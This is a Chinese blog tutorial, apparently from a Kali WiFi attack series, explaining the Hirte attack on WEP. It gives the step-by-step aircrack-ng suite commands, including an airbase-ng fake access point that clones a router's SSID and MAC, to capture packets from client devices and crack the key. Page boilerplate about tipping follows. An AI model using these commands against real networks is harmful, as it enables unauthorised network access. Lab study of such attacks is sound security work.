Kali-WIFI攻防(四)----WEP密码破解之Hirte工具

一、工具简介


Hirte是破解无线网络WEP Key的一种攻击类型 


只要客户端设备(笔记本电脑,手机等)连接过的无线网络,那些WIFI即使是不在攻击者范围内也都能被破解,因为该wifi的WEP密钥和配置文件仍然存储在这些无线设备中。

实施这种攻击的要求是建立一个和WEP网络相同的SSID假冒接入点。当客户端设备尝试自动连接到无线网络设时,假冒接入点(攻击者机器)会对受害者设备进行ARP攻击,导致受害者设备将包含密钥流的数据包发出。

Hirte破解原理:

1.安装一个假的WEP AP(wifi名,mac地址要相同)并等待客户端连接

2.客户端的连接等待自动分配IP地址

3.客户端发送一个ARP数据包

4.获得了ARP分组,并且将其转换成一个ARP请求为同一客户机

5.客户回复

6.收集这些数据包

7.破解WEP密钥



二、Hirte实战



首先查看网卡信息:

root@kali:~# ifconfig



然后监听网卡:


root@kali:~# airmon-ng start wlan0




扫描附近的wifi


root@kali:~# airodump-ng wlan0mon



然后开始伪造AP,用airbase-ng工具建立WEP接入点。 -c变量定义通道,-W设置加密位、wlan0mon是接口、-N使Hirte攻击模式。


airbase-ng -c 11 -a EC:88:8F:F5:9C:20 --essid "TP-LINK_F59C20" -W 1 -N wlan0mon

在启动这个伪AP之前,我把路由器关了。




下一步配置airodump-ng捕捉数据包并保存数据包文件名字为HSEK。


root@kali:~# airodump-ng wlan0mon --bssid EC:88:8F:F5:9C:20 --write HSEK


然后就是一阵等。。。




上的的#Data到46924差不多跑了一个小时,才到。。。。


只要有客户端一连上来,就会进行攻击




然后就可以启动aircrack-ng从捕获的数据包:Hirte破解WEP密钥


root@kali:~# aircrack-ng HSEK-01.cap

他破解密码是有要求的,第一次ivs必须要大于5000,当小于这个数的话,就会提示




依次类推,知道密码破解出来为止,我这里用的是手机去连这个wifi的,而且只要一个终端连接的情况下,ivs走的好慢.....在他大于5000的时候,我等了好久。。。。一个多小时,等到他大于5000,然后执行上述命令,又提示要大于10000。。。




破解这个需要很多时间。。。

Kali Linux是一个基于Debian的Linux发行版,主要用于渗透测试和网络安全评估。其中Kali-rolling是Kali Linux的滚动发行版,意味着它是一个持续更新的版本,而不是像以前的发行版那样有一个新版本发布。 Kali-rolling作为一个渗透测试工具,提供了丰富的网络安全工具和资源。它包含了各种各样的渗透测试工具,如Metasploit框架、Nmap、Aircrack-ng等。这些工具可以用来评估一个系统的安全性,发现潜在的漏洞和弱点,并提供相应的解决方案。 除了常规的渗透测试工具Kali-rolling还包含了在网络安全中广泛使用的其他资源,如字典文件、恶意软件样本、渗透测试教程等。这些资源能够帮助渗透测试人员更好地理解和学习渗透测试的技术和方法。 Kali-rolling不仅适用于专业渗透测试人员,也适用于任何对网络安全感兴趣的人。它提供了友好的图形用户界面和易于使用的工具,使用户能够轻松地进行各种渗透测试活动。同时,Kali-rolling还可以用作安全操作系统,用于保护个人计算机或企业网络免受潜在的网络攻击。 总之,Kali-rolling是一个功能强大的渗透测试工具,它提供了一系列网络安全工具和资源,可用于评估和保护计算机系统的安全性。无论是渗透测试专业人员还是网络安全爱好者,都可以从Kali-rolling中受益,并提升他们的技术水平。
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值